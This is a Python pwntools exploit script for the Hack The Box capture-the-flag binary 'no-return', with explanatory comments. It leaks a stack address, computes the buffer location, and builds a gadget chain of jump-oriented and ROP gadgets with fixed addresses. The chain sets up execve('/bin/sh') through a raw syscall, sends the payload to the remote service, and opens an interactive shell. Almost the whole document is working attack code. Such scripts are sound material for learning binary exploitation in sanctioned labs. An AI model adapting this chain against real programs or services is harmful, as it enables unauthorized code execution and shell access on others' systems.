- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- from pwn import *
- # Set up pwntools for the correct architecture
# Load the challenge binary and make its arch/bits/endianness the pwntools
# defaults for everything created afterwards.
binary = ELF('./no-return')
context.binary = binary
exe = binary
# Many built-in settings can be controlled on the command-line and show up
# in "args". For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST if args.HOST else 'docker.hackthebox.eu'
port = int(args.PORT) if args.PORT else 31635
# GDB commands applied when the script is run with GDB on the command line.
# Breakpoints sit on two fixed addresses in the binary (it is non-PIE as far
# as this script assumes); the surrounding blank lines are part of the
# script text on purpose.
gdbscript = '\n'.join([
    '',
    'break *0x000000000040106d',
    'break *0x40109b',
    '',
]).format(**locals())
- # Execute the target binary locally
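def local(argv=None, *a, **kw):
    """Start ./no-return as a local child process and return its tube.

    argv: extra command-line arguments placed after the binary path.  Defaults
        to none; a fresh list is built per call instead of a shared mutable
        default (the previous ``argv=[]`` was never mutated, so callers see no
        change).
    *a, **kw: passed through unchanged to gdb.debug() / process().
    Returns the pwntools tube; when GDB is set on the command line the process
    is started under gdb with the module-level ``gdbscript`` applied.
    """
    argv = [] if argv is None else argv
    cmdline = [exe.path] + argv
    if args.GDB:
        return gdb.debug(cmdline, gdbscript=gdbscript, *a, **kw)
    return process(cmdline, *a, **kw)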
- # Connect to the process on the remote host
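def remote(argv=None, *a, **kw):
    """Connect to the challenge service at host:port and return the tube.

    argv: accepted for signature parity with local() and otherwise unused;
        defaults to None rather than a shared mutable list.
    *a, **kw: accepted for parity with local(); not forwarded to connect().
    Returns the connected tube; when GDB is set on the command line gdb is
    attached to it with the module-level ``gdbscript``.

    Note: this definition shadows the pwntools ``remote`` helper pulled in by
    ``from pwn import *``, which is why the body calls ``connect`` (its alias).
    """
    argv = [] if argv is None else argv
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io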
# Launcher selection: LOCAL on the command line runs the binary as a child
# process, anything else connects to host:port.
start = local if args.LOCAL else remote
#===========================================================
# EXPLOIT GOES HERE
#===========================================================
# Register state the chain aims for before the syscall gadget:
# RDI = "/bin/sh", RSI = NULL, RDX = NULL, RAX = 59 -> execve("/bin/sh", NULL, NULL)
# (the strings appended below are "/bin/sh", not "/bin/bash").
io = start()
# Fixed code addresses in the binary; presumably read off the disassembly of
# ./no-return and only valid if the binary is loaded at a fixed base (not
# re-verified here).
main = 0x40106d
syscall = 0x401082
subfunction = 0x401000
# Author's annotation of the gadget at `ret`:
#   pop rsp
#   pop rdi
#   pop rsi
#   pop rbp
#   pop rdx
#   pop rcx
#   pop rbx
#   xor rax, rax
#   jmp qword ptr [rdi+1]
ret = 0x401062
# Remaining gadgets, named by the author after the instruction sequence at
# each address (names not re-checked against the binary here).
dispatcher = 0x40109b
new_dispatcher = 0x401022
inc_rax_jmp_rdx = 0x40100d
pop_rdx_jmp_rcx = 0x401050
xchg_rdi_rcx_jmp_rdx = 0x401067
xchg_rax_rdx_jmp_rcx = 0x40105b
mov_rcx_rsp_jmp_rdx = 0x40101c
inc_rcx_jmp_rdx = 0x401053
add_rsp_rsi_jmp_rdx = 0x401035
add_rbp_rbx_jmp_rbp_minus_57 = 0x40103c
# Padding length in bytes; presumably the distance from the start of the
# input buffer to the slot the chain overwrites.  The same 176 is hard-coded
# again in the buf_addr computation below.
offset=176
# The first 8 bytes received are treated as a little-endian stack-address
# leak; ljust() pads a short read with NULs so u64() always sees 8 bytes.
stack_addr = u64(io.recv(8).ljust(8, "\x00"))
log.info("Leak stack: %#x" % stack_addr)
# Buffer start derived from the leak (leak - offset - 8); buf_addr is also
# the last value written in the payload, so the leak lines up with that slot.
buf_addr = stack_addr-176-8
log.success("Buf start address: {}".format(hex(buf_addr)))
# Two stack slots just below the leaked address, used as data by the chain.
stack_dispatcher_addr = stack_addr - 16
jump_addr = stack_addr - 24
# Payload: six 8-byte values annotated by the author with the register each
# lands in, then the gadget chain, filler, and the trailing entries.
exploit = ""
exploit += p64(stack_dispatcher_addr - 1) #rdi
#Dispatcher setting
exploit += p64(0) #rsi
exploit += p64(buf_addr + 57 + 8*12) #rbp
exploit += p64(stack_dispatcher_addr) #rdx
exploit += p64(stack_dispatcher_addr) #rcx
exploit += p64(8) #rbx
#exploit += p64(mov_rcx_rsp_jmp_rdx)   (alternative the author left disabled)
exploit += p64(pop_rdx_jmp_rcx)
exploit += p64(59)
exploit += p64(xchg_rax_rdx_jmp_rcx)
exploit += p64(pop_rdx_jmp_rcx)
exploit += p64(jump_addr)
exploit += p64(mov_rcx_rsp_jmp_rdx)
exploit += "/bin/sh\x00"
#exploit += p64(new_dispatcher)   (alternative the author left disabled)
exploit += p64(xchg_rdi_rcx_jmp_rdx)
exploit += p64(syscall)
# Filler bringing the payload to `offset` bytes minus the three 8-byte entries
# appended right after it; `/` is integer division under the python2 shebang.
exploit += "AAAAAAAA" *(offset/8 - len(exploit)/8 - 3)
exploit += "/bin/sh\x00"
exploit += p64(add_rbp_rbx_jmp_rbp_minus_57)
exploit += p64(dispatcher)
# These two land at byte offsets 176 and 184 of the payload.
exploit += p64(subfunction)
exploit += p64(buf_addr)
# sendline() appends a newline after the payload bytes.
io.sendline(exploit)
io.interactive()